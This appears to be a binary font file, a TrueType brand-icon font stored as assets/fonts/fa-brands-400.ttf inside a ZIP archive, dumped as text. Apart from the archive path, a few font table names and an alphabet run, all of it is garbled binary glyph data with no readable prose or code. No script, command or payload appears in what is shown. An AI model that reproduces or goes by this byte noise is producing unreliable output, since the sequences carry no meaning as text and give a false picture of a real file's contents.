    PK!;\\assets/fonts/fa-brands-400.ttfnu[  OS/2_YWU(`cmapn Xglyf)head!^p6hheaD&$hmtx mloca.| maxp: namekpostŋ0)j1_< __8'LfGLfAWSM#@9 @@@@@@@@@@@@@@@ @@@ @ @  3@$ @@@ p@@@@ @ @@@@@@-@@@@@ @  @    @ @Lh@@P  @ @@@@@  @@ @@ @ E@ @@@ @@ @@#9ZabcdefghijklmnopqrstuvwxyzIRW@`:J1p6L^aknp~\u} !#1MRWY?B1]{=B#0AabcdefghijklmnopqrstuvwxyzIRUw@`:J0p6;Zfgjkprsy 017:K^`cmp|\hx#%MRWY ?B0]z4?    oi4 uD"~zxl[ZYXWLKJBA6432/$  ~ } { y x w v s r p o n m i h ` _ \ [ Z Y > : 6 5     ~ $ k O F C @ > 9 $ #     P I &   hTP   !"#$%P\dvH\h   p 4 $  h PXpD0 $ l, ,$%%@&@&'l'($)T*8,0-P..02h35066d67;,<=>?D@BBCPE8FGHI$IKKdKLMMN@NOTOQ`RRRSTLUUXVZ\4]X^8__`|bbcd(df|h0hiijl m mnoprt(vvxy\z{|4~4Dp8<X\LxxxD t dH@l,lɠ̌ͨpМҜӸxXרڤ\ݬߔL$0hdx\0t(h  `  XXd,|H !"t#$,&'(0(./0123T3457<7:;<;3223>``D----D  23>>32@--CC..@*%1#!"'&54763!2+32+32@         @$1+32+#"'&54763!2@        @%11#&'&'&5676767#&'&'&'6767#"'&5476;2"!346C1222>+&& )C-- ##A=++   H1232;?23  -,E%& ##7   (#"'&=!#"'&547632!547632          @)%1#!"'&5476;#"'&54763!2+32@  ``  ``   @   @$&'&'547632676747632@--DD--  ))  C,,,,C# #(( @)%1#"/#"'&5476327632:   @    Bm    @%1+"'&54763232@       $#"'&5#"/#"'&567676        #"'#"'&567647632     < ( ,11676767&'&'&'&'1&'6767>3223>>3223>D----DD----D23>>3223>>32--DD-,--CC.-@$#"3276=36767&'&'#53  `D----D``))  `--CC..)) <%67&'&'&'67367654/&'1&'6767'&#532>>3332>D5/ /D----DD-- F H#,-=V>3223>>32#9  9 --DD-,--C7)T  V@#/767167&'&'#"3276=3327676/3#5(()=  ]i  Up""p#$.=)(    w""`>%'&'&'&'&76767676'&'&'&'&7676'&01^ /&./+*  ;22?$&% *E  C%%?$&%E8    41,$    41+#"'&5#"'&54763!2    @   `  $&'&'547632676754763267QQ76  %$66$%  P6666P 5$$$$5 &'&7676676~    t  9  ?&0#&' "'&767667676=PQ  nUUn u  $%  )%1#"/#"'&'&?'&76767676y         #"'&='&76767676z    mז    %1#!&'&7#"'&54763!32    @    L    z09&'1&'0&'&'&'&74#1332;67&'&'&'&'&76767674'&'&'&'&'&'&71&'&7067676'&'41`    #/ ,=-3    &   !77D\CB @-* #"""  --&%     &D77 !98X5## ' 9EM[gk132765&'&'35#7&'1&#32767533&'&'&+3#36765+53#3#3'##73'!!27676'&'&'#32#3'~ (OO"++-_((_k-,97 "J  z@@67kk==;:pT G..[E>!! S+---K[  [[@:9n+43&%U21ge34 ;%67&'&'276274'&767'#"/'457'&723?6#.?>__>??>_)&2F: ;;:HHV5IV::::VW::& ,E))E,DD 376767!"11!676745454545 "!3GGCC13%$%%$,+   (I3!"<H2"",-9;22;%&2 ""210A@10*/&?5756/7''54?65'P_`PN_PNNP_Nd.88.\w.]8p/.ww./p8].w\.%&#"327654'&'%!#5##"'&'&5476763257+    I5(  8   @   N HXf{71327654'&'&'&"#"#&7232376767676'45456'&'&'1&76327&'1&76327!!6767&'&'##"#"'"'&5&545474763632322 }    }1,, #U  [  `  '''' )    &&,))#    ` ''''-&'1&76?6''76'&'&7676's   \\  \\      t {} }{  9ER4'"#&#&'&'7&'&'&'&/&'&#"#0'0'&"#016767'2676711"'&501736765&'&'&'&76760'&76' ~ c &- /8     /%   2  _ X O66HH67"  /##  ,+88**4@ '   $ ,   %9   @y #'%35#53535#35#35#35#35#'35#35#535#}}}}}}=}}}}}}}}}}}}}}IeHHIIIIIIIIIIII271016'&'&#67676#67677675'&'!534@i;: 78M  9 !!5BDD&+??21:B97@@Y0$%4./E70/ i?4?A'FUgs|73#"'&'&71676367&#67674'%&#"632&#"3273354'#'&547632'&+3532725676'&'+5327#'#37j9)+""      ^?' ''  $%4O)  002      OY    L? A \\x@  (2@Ky%'&576/414'76/"1&'76'&'74#&'7&&/&&#'&"/&#'&"##'&1'&0'"#&0#0213737?0?223?201?63?2363?43677'6725'67276/674376/6576/4?6'&#"/&&'32=4#73231'&547631#1'&5476;'76/3#&7'671'"'&5732#"'&'&'0'6767&'&'&'&+67?#"'673'"'&5"'1&76312#                      %)(& -0  O   X 5   ?     +> )!! #                         ##  6#        x#%$$ T    / %(  %%"''&'&7676&76531D7&&7886617+ &'"X +$'@*+ !6665!Z ,* !] 3 %!533=#3@}}}@`3Y%'"'&7637676?4545&'&&3!01012?6'&'7"#2#010132765&'&'++55- !""( j  23 $$5"9(#( (  c  6#$&!7676767!3&'&'&'&501!6'J !))U8 %YQN88 @## G&&,8 '*+,/<%'&017010176'7;2/&+'&+32?45#"32?6#'CoBCCCBmBm `$276767654'&'&'&#7'!3@     B/.`    @./B 37%'#'t-vutg 9]' a%&51476'&'&'&767676776767676767676545&767676'&'&'74'&'&'! ,HAA   ""          c%,,,!"F$& &   !    ,AM%#327654'&#'#327654'!!6767&'&'1#!"'&54763!2#327654'&#1:: :: """"?}:: b  b  a""""b  "AO]ky72767654/7654/&3276=3"5&'&'&#32?675&'6716'&#"7132765&'6716'&#"'132765&'6716'&#"6716'&#"7"132765&'132765&' uKdtJJ ee % @ ? ? @ >    E+ :s UC++ ::,   T   T $ R H ,N`11676767&'&'&'&'1&54??276'&'&'01&3'67632'7654545'5C66  66CC66  66C( g N   I//80+* "! <=[ 66CC66  66CC66 c--5! N +$% \=>h!3FXko7#'1#'317337321#"'&54763271654'&'31'&'&547672153#'1327654'&'#5##"'&7533'533#%&-&#$/   "   "" &&luuttvv,h    >f   fLF$AW%33535''5#73SSIRR|yT p/AA/PII{{iLi#1Pbq7"5&'#3675327654'&#&'5677"132765&'75676'&7676'&'&'1#"'&'676322716'&#"1%"9&563270176'&#"&'&132765&'&'"5&##&=3275&'#5&'#1#1;3276'V   . *$$##(V''''2    #` + > $"l +  !; Z- -%%$# %###k        =3@) t(6:Oby74'&+"'&?6736?6'0#01#2;6?45054#0101#337#%#"00136741#"30136?6'01#0010136741761#0101301327  "   Q)3i43,)[)\) ) 7)\)\ * )< f)!h)3Qz^))4^))+@Th!&'&'567673'&5476323763231&'&#!"!67675#"'&=4763213#"'&=676321((( IXK ('  @         X'(+'  EE  F   + ! ! ! ! Q@Tan{%1#'&'&76796705#"7676767367676#01#01"'&''&'&7676"?6;2#'"?6;2+32754+"%45145&'&7674145   !< e 70)%-,+! 8.&""6,& pq/KD?, %&   + ->+  -+4(,     - (!F763#"/32?/&+7632#"'26?6;#"/&#"#'&54?3 Mab L L baML  M%;;%M  L :: MabLJMaaMLM  M::M L::13!67671#1&'&'367167!31--77-,7-,7--6$$$$6$$6$$6'132?654/&#"#1"'&547632###%00%##%00%""""%00%##%00%##""""#)1:11/'&/5671?1 '%737'7/7&76* + ED +   ^J +)/)  *   4 '{z'@c)ma*MBo U`M{ +M'&'&76767221237676322#"'&/&54763251##'&'&547676323232147165167654'&'0'&5&'&7416743436362"#"'&#&5"5&'05&7671#"'&'&541&="#"'&54?632#"#&/67676'&'"'&'01&7&7476767231#&/&74763267&'&'&76761"'&'67620#"/1_98 HJa,,W@>3$#*)$$  ##W8. >?J,,W@> 34U)0F? '011F? ')NPaaB@e//Y<=WWG" k!!&& "&'++'&!"%&!"&'++&'zD:IICC('c//W<>VWGF1#E>!%#0V#10#F?!$$ %K6'&/&'67632674'&'&'&7671'&'&547676#"/1 ?"!!"?    S2  ?!!!!?   S2  -88=?88- EW.,+$ @-88?=88- EU0,,# 5>G]{67&'1#"'&547632673#"'&'&'&'367%&'6767&/&'&'6767651'6776767676'&'&'671!&'&7677'1O"x""**//*+!"x"#..#ny##  !! !Z! !![..*)  )*..."    "  "" ""   I!!6767&'&'101&'2327"'&'7&'&=&'67&7676767  `  1)*<9,/" #"*    ` -*+ ##  /!35#5356763201#"3#36767&'&'  ??+ E :    H7.= /H ` +E!"3!27654'&##53'"'1&547632##56'&'#5336763  BC"   BC@1    hj ,u mv!!6767&'&'"74545&'6767&'676'&1&#"&'&#"'&'&#33701#&'&'6767'"'432'#"'672''&563''&76''&76''&76''&563  `  {         2--GF//3b      `   .    .   *+8F----F8+*=  8101&'367&'&'327&'&'5&'67&567676767#"CBaZG K8$  %,'87B,/$ !(GDD--.,' 90 , % 0%&'1&'1&'5#5356763201#"3#6767!!88EE88!!::[??+ E :[::E88!!!!88E_CCH7.= /HCC_~7#"5632'76'&7365&#1'4545"'&'4'&'&'&7632767&'&'4767&'&76016324767676767&'&'&'76'&'76'&76'&'76'&,BkDD..M    ,!!  !    L.-!"89F ! 3DDjU@@    F    0 #%  @@UF77 #n%11"'676767670136767&'&'767676'&'&54767&'&767676'"01&'&'676767!!88E&# 9##++BP*) 5.!    G++!!88EE88!!E88!!   ,+B?'(,+=   + -3    >=PE88!!!!88Ef#676767676767&'&'767676'&'&54767#"'&76767&'&01#&'&'6767! 9##**BO)* 5."   Y  ` p    ++A>('++=   +-3 # "& `  8E!!6767&'&'&'1&'6767&'36767#537##5#53533  `  ++)  9^,   ` ++  " ,R s$1%&'&'6767&'&#6767#535##33535#12TR6666RN24 3!""!38m877888T3466RR6602 ""44""C888888-7#3'&'1&'676#56'&'#336767d]].]"# ]Z "D+) +)'(>Bew71&'&54767%'"#"#'&'&'&747&5476726326763&'1&'#"'&#&'7376767'167654'&'    &#$*)&&++%%)",-)'!(@$#""$0$"#S  w32-%%-2@1   2@3""++7{%#76'&+###'!a410'73?!7!7!7!@RtM PP_),,aR5R|9N`%6'&'&'5#"5##"#&#236'"#232#3523013567676'&/271611'"#55236'"#6- /11     @11=&%#>*OMNO4 :DCCD8.l  `j  1:>&'&'&'"#"#23012367676767674545&'&'5& %22++++22%  %22++++22% D%  %%  %֣QR'71+&?2#'&73271#"/67676; A E,A -ܐ[ A ]!] B +1  zL  M  ;  &9!!6767&'&'#&?01'&732#71#"/67676;  `  . 1 . 0gB /B</    `  W6  7U ֵw  xj(   '7'77'?'7'LUTTUTTTTUUTTpTTTTUTTU} %'7''7#3!5#!5##; w b'(g()')~ U%T ((x#0Y16767&'&'&'1&'67677&'476324'&#&#"#""7236776565454'#"#"#"'&'&'&'&54545476767676232321 !! 11 !! 1    L%'6%$$%6(%%'7%$$%6'%0 ""  "!  !"  "" 3! 11 !! 11 !    7'%%'6%$$$7'%%'7$$$%  !"  ""  ""  ""&8!!6767&'&'&'1&'67673&'1&'6767  `     ` &#711&'&'&'676767'3733AA!!88EE88!!!!88EE88!!d""bcYE88!!!!88EE88!!!!88ES44!676'"#!#'3DF D-hd ֓8/1&'&'&=#"'54767676;3#766 $; /  .G S  T!  ! D "!! s R  AB!!6767&'&'1#&'&75#"'54767676;3#76  `  R7  ,44    ` Z+  H4S(|.?%&7&'&&'&'6767676767&'&701'6716'1017?38  ,"#- 9 '7( !!C'*   *# 7#55#5#35b"Բ|"@@ 7%&'1&7632!&'1&7632%76'"1&#"'&1!&'&'  0 1;@@;1 0?&'@'&?  S UU S#;:KK:;# 'i31327&'01&"3232710721256#&013&'141&'&'&'6'&'&'0'&'&5456'&'&'#76767672317676767676'6312&'07676'&#&&'&7'216'&#16&7676716743676#"'&'&'&'&71'&#&'&716'45&767676767676'&'76'&'&'&76767667676767767676726'&'&3"#0#6'&1'%1'&767676767217672360316701676'"&'&'01&5&'    &+          )                         E  *% !     =      =          $                      '5CR`n11676767&'&'&'&'&&'6767'1&'&'6'1'676745767&'67167'&'&'1&'6E88!!!!88EE88!!!!88E.++7 :8322'L77 -z ??R :005R++A 4980 3%%$!!88EE88!!!!88EE88!!r8L0#" #!""02&'((-:T#%%;++% )):,%$ `%65&'&'"&'276767&'"'1&'476367&'&'"'&'&'&'67632#&'&'&#&#::W'0 ::W'/ 2#" )  +!"(+!!  ( !!"+W:: 0'W:: /'[   +,   &,p$J!3676767601621367672576'#32#"65673C  ?S 0:  k[I :NI ! @J<    FS.D!014!6767&'&'#"'&'5676;271+"'&'567673PS  S  Q  Q HGP  p   111676767&'&'&''&'&76727676E88!!!!88EE88!!!!88Esqq  !!88EE88!!!!88EE88!!♙      %F173767676'56'&'&'&#&35367673#&'&'#&'&'++KK++++KK++-3005M)*++KK++++KK++i@JC11X4F\n|6'1&'&76'&7"'1&'1&'676763272167&'1&7676'17676'&'&1'&'&7676'&17676'7&76' ' 611J3-- >## C=>g..BA()/.AA)( %  *)4O!   V    !   &+DK20 3 33+,*!!+*!!+ $3++           &1&'6767&'67677&'1&'5()B899Z)A5+  ,5BB)(Z998TAB!C]^CC'(00('W!BATCC^]CY%1'1&'1&'&5476767'&'667#&'&'66765&'&'&7&7676'"'676760/; 1()6$$ ""$#;"!  < .""!! ''-2 >$# 3 6$+;%%.&& A)%"&7!+5#"'&=!5!5!5!%!!54'&'Wdd[tZZUUnUU:!!6767&'&'#"'&'&'&'"'67676767676'&6  `  ?B-   %  B2   ` .RT34 7`- N?#3GWk{71#"'&'67673347167&'&=7"'1&54767#21#&'&'676;471632#5#1&'&'5676721&'&'535"'1&'67673+^   /    /   /  v  v   /    /   /  v  v   /  v  v   /    /   /  v  v   /    IR^y&'&'67&'&'&'47632321&'2327630127'&'&56323276301276767327&/76767&'11&'&'&'676767#&'1&'1&'676767>e6 !R ;U8./M/!  L @%"AA0=!!88EE88!!!!88EE88!!  65BB56  65BB56 32@/(L& 6,[G& y -00<8.fE88!!!!88EE88!!!!88EB56  65BB56  65B%&'&'676777'7&'57DY8955T7""&%;D%(F2#  ((96(' + %'T!+ a'#31327654'3798`j'^ # B]h]3ZS )%1&'&'&'676767&676767#53@AmE88!!!!88EeAC/::,++,A1lBB!!88EE88!!?A*)*FC,,V#N`i7&'67%11&'&'&'676767'"&'767&''"&#67674'6'&'#1&'&3276'&767&'.!!88EE88!!!!88EE88!! #38=3# %%88&%E##2E88!!!!88EE88!!!!88E) N  V ))t K&;l%#"'&763276'&'27657367&'7!&'&'6767!"&'732767&'&#'&&#67676'6'&'&&"![ [    ` d &7;  B6% ((<=((f6    `   T  ]  ++ <T11676767&'&'&'&'&'536756767'5&'1&'&'5767535E88!!!!88EE88!!!!88E :" ":!!88EE88!!!!88EE88!!k  ..m { / /0!;%&'&'57676=3'75&'&'&'5#6767547632 /0 "4 V#3 // V /0  F/  /FG H:$/.EF/  /  /;&51&5&'&'&'&'01&'&'&#&#!3!27654'#5#56733  `|  ` ` "',1#35##53%3#35##533#35#73#5'3#53#5RR3)RRRRR3{4444L]])]]))]]u33L1CX1"'5632"36767&'!&'&'6767!67167&'&'"#7534'1&'"#7536765  5      `   -4  4   D CD    `  !" 3! 3"9EI7&#""17&'&'&'101674'&'67676767#5"'&'63675&'1�&'&'&"3"'&'&'5765&'"#&'"#276767327676763676=&'&'&'01&'25276767&'&'&'7/7'27676745&555 '  f-  19 ;##8  !  5       !"    % %! N G -  ^"  -##                 %$/".=3 !@Vx&'1&'0101276745&'&'01#"'&109&/&767167671&'1&7676767#71#&'1&/&'&5&'5&76710*##65SR88##*  +-P(  ~; &T(11CS8866RC11(  ,2 $ "j= $+%.&Qz4716726&#&'&'&'&'&'&7&'&5016767676326'67654'&'"&6'1&'&'&'&'&'"'767674'&/#"'&5&7'2767767676767672., d,&  ,  ,-  --d ,T,'   ,,  %d +-  d,& u, -14 -,d  , 5-'  -/4  $ @u%*DJ765&'&#327674/36+5#536#%#534'1&'27##&'365'67#0 !/2$%AI OSSU6g8 =;$###=\>>54s546Ee  Sb5 ##:('&&;=$%W @55-2B^7'#536'&'1&+3273&'7!&'&'6767!35#4'65&'&+3276?4'1&'27##&'34545-. (+?   ` NN+#[]! !2" "e4R -  `  in'    !/ "1HZl%11&'&'3276572767&'&'&'6767'7676'&'&'7"'1&'67632#567167&'&'!!88EWA@_T)'(; EDeE88!!        E88!!12O'<)((V 7b@@!!88E        HZl76'1&/6'&'767!6756767#&'&/!6767&'&'&'1&'67675671654'&'  u8%%&OY `  d  [    E 0 Q%%&8%q  `     1Mf11676767&'&'&'"'&'&"#&56767"'1&#&'&"#&'47676327"'&'&"##&'67632E88!!!!88EE88!!!!88Ee/556 >=<6  0?@?dM 9POA5A765+ !!88EE88!!!!88EE88!!  B - L  @3#1#57'#53?67613@b[ ,]]V+bc T]  T]5K &3@MZm7#"5'7477"6?'"32?'&#"32?'32?'&'7"3257'4#7"3257'4#7&'3257'4'&#"413276=7'&'"32?'&#&'&'"36767&'&'%657'&/6?'&'"6?'&#oox'&7""6AEEA-iEEiDD`####9899 DBBDFDDFo @ /:DD>7#$ "!<AACCCC2%#'&'&'&'367&'&54767'"'67&#"7&& !"K&+!&18 %%64;++ $$MNuFF-,?&'12 !!+*.2<  %*/3'&?6=4/'5#'75'77'7577'7 M_,_M77M_NNNN_M77   as3?gg?3s%%Js3?g4444g?3s%%J:0]%&54'&'&'&'&&'&'&323232767676'&''"##"'"#"'&7676'&76327676'1&'&'&'&'&767676'&'&'6767676'&'&'&76()120).'' %#" ""\\( ",<='('(C ""&(244%$ + X  "# &   3 3)0!!$#'%!!#< (( ''? **&P   # -  j&'1&'1&7676741272767016'&'&'&'014'&'701676701017676501676'&'&#&32G78 7.   ,,  & ($$BCl8"#99F<44$$$232  32  %% $&'"#.-YoDD .=Lg&'&'77&'47'67'7&'&'&'5"'767'63567'#6767'711&'&'&'676767#&'1&'1&'676767'67&'6767'67&'7&'&'7&#"'767' ;00 (>  >( 00;x(>;00 6(>;00 ]!!88EE88!!!!88EE88!!  55BB55  55BB55 '  3 @@ 3  4 @@ 4  0  .  1::1 p .  /9- 0  . /  E88!!!!88EE88!!!!88EB55  55BB55  55Bk  /;:1, ,CC, ,CC/8\n711'&'6?1654'%!&'&'6767!327&#"#&01676'&'76767&'7'"=#3#"37''&741535#01545#236767e ?   ` 1 CD* U 4  He&$  ,r  t  `  E.&   -  XiK  =(B* ):I_h#&"13676'&'&'776767&'71'1&'67'&'1&7167563676=4'&'&'733'&'632"'&=416#&56767373#07O! 7mC  %? % 3      T?$$$$%$ &9= "(.   H' &   d w! $##$#j$! )a   !!1010101#5'36767673@P%  #Q@6eg8   7gD1'&767&767'1176'&76767'&76767&'&'H 6  2x@++   #$3:'&&')8..//G0bPP7"5IHY%%877 /.-'':.!"   )(4G//I%"'1&'1&5101'&''&'&767&'&5#"5&7676767&767#  $$$$   '&VU''     4 Z=>==[ 4 3'5M[i2&'&'727&56767'"'&'6763"'1&54763&'1&'6763'6767'"'1&547633"'1&54763 76IS77LD ..Gh    00CH....H6k<&&..GQ3;"B+,5 0 <'(('<<((0!#`~"167654'"16767&'&#5&'&'!&'&'&76745454537676'676'&1'1"#"&'&"#'&'5476!6   P!  !O 0('"'&/ =,&Z %#H*+ $  $ *+G$$  /#3'#3'3737#5#!&&j''ataM'MMDW5Ynnn[[[I@@~!2CR7'&'&767676?&'&77676'&/&7&'&?676'%76754'&#+dk  ,$+   J ; " i ! > k  h  :61 ,)  o R n^ ' " ( [   $P711+&567272"#&7&'"#"7367410767676237676'&'oK ;+=, $$3  "#%&  @  6&&   t &&./4 g#"  ?= %5&'&'6'45#3&'&'13&'&'#7&'#6765&'7  0] >h !05''r &&9m YI AYI30(%%#%'I Ri401,XQ]^dh]]ND  FL.445of@$27\o%1#676707677!&'&'6767!7#/&#;7#374'&'4727&'"#"/6767'#&347673013!j     Y?+'@$+^(("      <*4%   `  jH 2 !  #2  @ Tj *8HV_%&'67%67&'73&#67&'0920#0011"15015"101&1414143014103030301201003101410501"1#3513'!&'&'6767!127&747&'6514'&'&&#"5#345&323&5&36357#&#2735"'6327&32#"'767'#"'535#5##33?3&7''&'7&5#35476747167&7''&57#&7353"5#35476?#&73573535#3450'01"50#01"10##101033230303052141417#'#1537357&'1&'36767    v k  jK     (';)#76#);'(5555   -(    $   ;    B  "(  (':*#$ %#*:'(&        Y  `  :('0CD/'';l,@@--@@,M%%      % %%4K|}P;''*+**'(: @-9@Re%4+3257!!6767&'&'23161#'##'3#3#3#'73#/21#"'&54763&7'&'6762716'&7676&'73#5323#53!676767%&+327654'     ,8--E$#'  1a     f  Do`YX>?*     ` #!!RR77TT     B   R  R"! `6 @1:=EQSgo\v4'1&+3532356'65#536'#'#373523767&#535#53'7#532#'5#35#535#514'1&#3736376'65#536/5#'#'#3733537'75"#"#4541&##4545'#&'&'#536767325232536763236763235&'&'!67673536732323212322536;230;531253#&'0'#&'##"'#&701"#"##5#&'&'#&5&'4'##!676='"#735#&36'#375&'6#37&'&'635#&36/5#35'535#5'"737"#"1"71'";733535#'#'##&7476235#'35E  '    5CB! h($$)/&  77'&&p '   #"  H'1 RS :   O      (.g  (  +() 4 B4 # $!   9  ! *78'&&#"#"  Y E   ZE6   F [ E    PF//BBF7777      ]   n      \       ZA  ((E  l  #"33E11BB7 (FF @ 5Ke7"'672'#"376'&!#"37&'&7!&'&'6767!4'1&+;6?62367#01&67;6?4'7454'#"'&'#"36?4'1&+;2?62367#01&67";6?4'74'#;6?167&#i      @ ( -U    (@  ( -U   /Z0   `  f-    @b\'&  kf-    @!he4 @$CUeim%&3&67&'7!!6767&'&''527&'&'&'672&#&7#327#"'&'573&1"#536761#53557&'53672#7#727#"'&'67632$u       j/  .  E  #J$ ,$$$$J#F 5   ` ' "  '"  82 r!U} }}) !3  1NN7'"'&56762767&'&'&'&76367&&'&'&'&'&'&'"676501#* "#J7!! '$(*; [*F <, NA!"~1Q3*63 +,1$M0; ! @&&'&F `!!6767&'&'&'1&'&'&'&'"36765&'6737&'&'&'&767636&"3#  `  \/    NR1  % ,9%"   `  "   UY)   & 0  $FQ#&'&'#36767674'367&'1&'&'!67&'!&56767!!%3#&'67hC<=NE88!!5C<=NE88!!5`98U9..98U9..* D)*!!88ED)*!!88E`U89/U89/->Pf{%67167167&'&'&'&'&'&'&'67676'&/67167'7'47161&#&4#&'&'&'11&'&'&54767#"'&'&767"'&'&'676'232367414'&'67676767&'"#'&'&'&7636'12&'&'[      5--JY32 ##  "! "    ,A-"!             b  !" '' -,"89-,98X! k  ^< -e  1*!       %% ~  #?!&'&'6767! #373+V+   ` A__[p[)G  `  *[[2FJRdnrx|%'65&/65&'"#&#"#&#0227332733674'7674'767&''35#&501750'"/6501457275'650501757'7#7/77#''7''73#673'376357'557#5&/53#3&'#73#7'3?37#77'701'3 8jj86  7 4jk4 7  s,,,-3843.,,,F#@b  SPSPOD|q:bSu q9{K3ht36<]EE#rQQ""RRs<0/!.'56 hLL##A@V>23$EF^#RQrsSS"&-!11<86#NMi VBB#9)@#&&#"67267"'&'"&#+6766'&#&&"67632632 8//8!-/=*(;%!48<++<84 %*>G9119G>*+"14;,,;41"#&8//8&#Q +*))]""-''  z#0=JW%65&'&'&'!6767&'&'#&'56733#&'56733#&'56733#&'5673/0G;,-$!"#4~4#"*  YZ  W  G0/##9# $4####4+!!  oo      ' #'+/37;?CGM_77'7'77'7/7'7'7'77'#3'#3'#37#37#37#3'#37#3#37#3#35#367167&'&''6716#&'&#"36''71327674'&#'&5'#335#%#37'!!5!#3#37#335#535#'#335#35#'#37#335#3'#3d#|FX!!/""/""!!_""/""_!!"" F""F" ''''0       y V 5z u!! !! !!0""S !$""&    - * 0   & P " "''''o     U""+!Qjbb}VV+;;! ! ! !W B!" " *<#"#54'&+!67&'&'1&'67673&'1&54767j  j (( L|g%1&'&'&'&'2767676701&'&'6767676'&'#&'6767&'&'&'67676363!!2>**$#*)<79!!!   )(*@,,*+BI10'!$$01.  !2  ='&/ w3 &%10%% )*    ('AB))))4, "!"" 2    &%= /S"1367654'&'&'6767"'&56767&'&376767673676765&'&#P<=''=4!  "      5""54I0/T5  >%&5#$ !))*+#*- --/L,,.t&'7316767674'&'&/7'&'676727&'1&'&'&'&'&7676'&'&'&'&"1"#&03767676'&'&#}B[>22v19>23 3+F54NL6755Ne  ' _@22><3s22>-(( D-5N4566LN54        ##'##3#3735#735#7'3@Q^Q@00E RgYYgRD006p0 00 0p@@ v$616767&'&'167671&'&'167654'&'M3333ML3333L ''&&  v34MM4334MM43 00II0000II00,+AA+,,+AA+,!!7#/#35@N!. -#M@[ [^\@ 3@v*:%6&'6&'4#"&4527676'&'&'"""'ʤ52767676'&'&'&'&'&'&636'&54'&'&2""&&#3&&#&&&277367674/656&'16'&'671#&'2301&71676&'6767&'"'&774367721&'&'67631'&'232'1#"'&'&7123#1"'&74763231'67'&'&767125772377637767201&'&'6'1#&'&'476'&7167676'&70367&''151677677&'6731"'&'67676&'1&161767676'򻒿&'&'17676'&%"1767&'&'&17674'&'=       6BB;($    !   J     Z    0    t 6  I   j$    #''2/&&!      *882R5<=7 5;9/ j   F8                  $+    !!     !       !     ! !! 6  3      $#  B- @! ! -  {$$;      C   * #D%1#"'&547632'"1327654'&#"'1&'1&'7667676'&#     $WV22' JIy&&#%*%G"#~  .   * "#)&:%$/<I]x16767&'&'67167#&'5&'&#&'5#&'5673'+"=473+"'5&54763211676767&'&'&'"'1&'1&54767632#Z<<<{  #  `  p%1 $&''Z @&;P16767&'&'&'1&'676735!!6767&'&'#&'&'67673K2112KJ2222J(  P     [Q7777Q[Q:;.-5p12KJ2222JK21 $$ $$ H   ` `66PX4554X5++;Vh7&'&#"27'&'67623&'&#"2701'&'6762'11276767&'&'&'&'1&'6767! ! .! !  .H88 !"88DB88"# 88GV:988ZW99;<RQSS  !865#-    !  { !*7DO\iv%'11676767&'&'&'761'1&7'761'1&7'11&'5676&/&7161/&716731#&''1&?6171/&716'&?61&'56711/&71671/&716'?1/&7167#&'16731&GZE88!!!!88EE88!!!!88Eb:K @  9(^BC@  mt#&mR!!88EE88!!!!88EE88!!Y" *  I   *  mttC -:7'67636'&16767&'&'%7676''7'&'M$327A ((1  8 %H%11##531&'&'&'676767'&'&'67677&'&#"6767 &1 9:ME88!!!!88EI87"&=*P@****@J+;..8=2112=<00 ,aE)(!!88EE88!!$%@mb E**?@**>"012==214 %'?#7%737d%`TSY.Y}T&`:L9fs%#"#5&+"#54+"#5&"#5632376754#"#"'&#"565&#""#&#54+"#54+"#5&+"3567635&#%+"=4;23+"=4;2$%%   $$$   &<  p   `$ $`@@@@a%#"'&'5#35673#&'5#&'&'&'&'##"'&'67632237676762367#&'#"!5476Y YY e  %%  7Y5$Y ,< "!#6 '6%1+53211&'&'&'676767'&'1&'#3536767F FF !!88EE88!!!!88EE88!!%x2F% J %E88!!!!88EE88!!!!88E%%J%|BUh%&'1&'!6767&'&'!"'&'6767276'&'6767767#7#&'&767&'&76##"'&7654'&76/.C7++* 0"(! &5$$ %  %G  B**3,0 (# !#$5 #4C8  -66- 7C0( ## (0!F7&56763'7&#"76'&'&#&76&'7'3767676'&'*0/GF,,2&8C(#"#"">&#^P@!#=(115' ! 3L&'H'$%  ?/'G# %$#"  -'7'711''&'&'476766#7''77'%+,,,+*)99--,-9V22O}J]]JS+V+++Vf7777fe9987XI]]IY& ?''77'755]VllVb)22222gV ll Vƕgg2d222d 7;A%'010101015'&'#'&'1910101010101101010901010109210109010301010101011010121090101010901010301010103001010101010101092312310101010101010101410301010101210101010101010901030101014101010101030901010301010105010176/#%#&?'30901010101050109310101010#7/30909010#01010109250101010113776336e.]/]\B'"A[\ħSS돏k>G0xjxz>&+6;%11"'&'"#"##&'&'&7&76767%35#5'&'7'35#1 0&=BG#!"'&54763!2&'#''#!67%#53#53?##53#53'7##53  j % o==n jIIII 6v@T@v6Tccu j jK22K%%J&&,,I%%J&&,,%%@1111#''&'&'&'&'&1132'&'&'&'&'&'&'QRQF "33:0 P $$1# ;&'9888$RG+'33L5F. !/11 '&#-(()l'"#&'&54767637!&'&'6767!&'1&'&''6767&236'676761&'&#36767676367227     ` @ C6T   %  + ** E  `  A''+S;  !  Qh%&''67674'&#3236'&'676765&'&#67676767676763227&'&'&/'"#&'&74767632 59'&%$B    (:('    !  ,-6 -.+C##? (,-5!   TCC %&' ;\1&'76'4'&'&'6767267&767676'11676767654',!! &&=n 02%%<  R006#/0/0#)m  $!! ()OH+,(y<('H97/9:01 &%5:))  54IH=% %/67-     " #$00'Nk!!6767&'&'#1"'&767672&#67676'45&'#27674'677&'676767&567676767  `  w"/0"!4&  E&         ` ##&-. ! %! $$ 2-"$R.%""    %&'&#&'&'&'&'&7676767676'&'""4'&'&'&'&#""'&#72676701676321767676767676756'1#&&'&'&'&"'&54'&'&'&767676'216'&'&'&76322354'&7676767671723676763203 "   "**"   !  "     7   ))   7 Q           $      !!6767&'&'1'01"01#"'&'&'&#'&'&'4'&'&'&'&7676767676'&'&'"'&'&'&7632234767676322363232'&'1&701&767676'&#"#"17056'&'&'&'#&1"'&'"#"013267676327654767676'&'@               $        $     @    &   &             ,<&#6767&'"'6767676767676'&&'1&567672+H/6X;;;;XX;;: ,22K/) H22K(%2//0 :;;XX;;;;XT= 2CK22 U+*2##'K22.GGiQX_fx70901097"''''7777327'67'67'67'654'7&'7&'7&'7&#'7'75''5716767&'&' - 3= @DD@ =3 - - 2= @CD@ =2 - ʼG////GG////GۄD@ >3 - - 3= @DEA =3 - - 3= @D uuvvennnn3/0GG0//0GG0/3?3##&'&'5676?356765414'&'&'3#673&'7[, &'C+% !-$)>2f 0>t%&8pKb11 3 ,,g0;  q471632&51##&'&'&'"'&5&'67&'7&'&'&74767672676767676767672632#63%16767&'&#"4767654#"'&5&'6753&'6753&'6753&'67571&'&'4767676767676?4'1&'2766765 0 %%     " "!   ##(  /       2)!0)112M*)4I++#    ! ,/ 1  h''      %% ,@    i)**  2        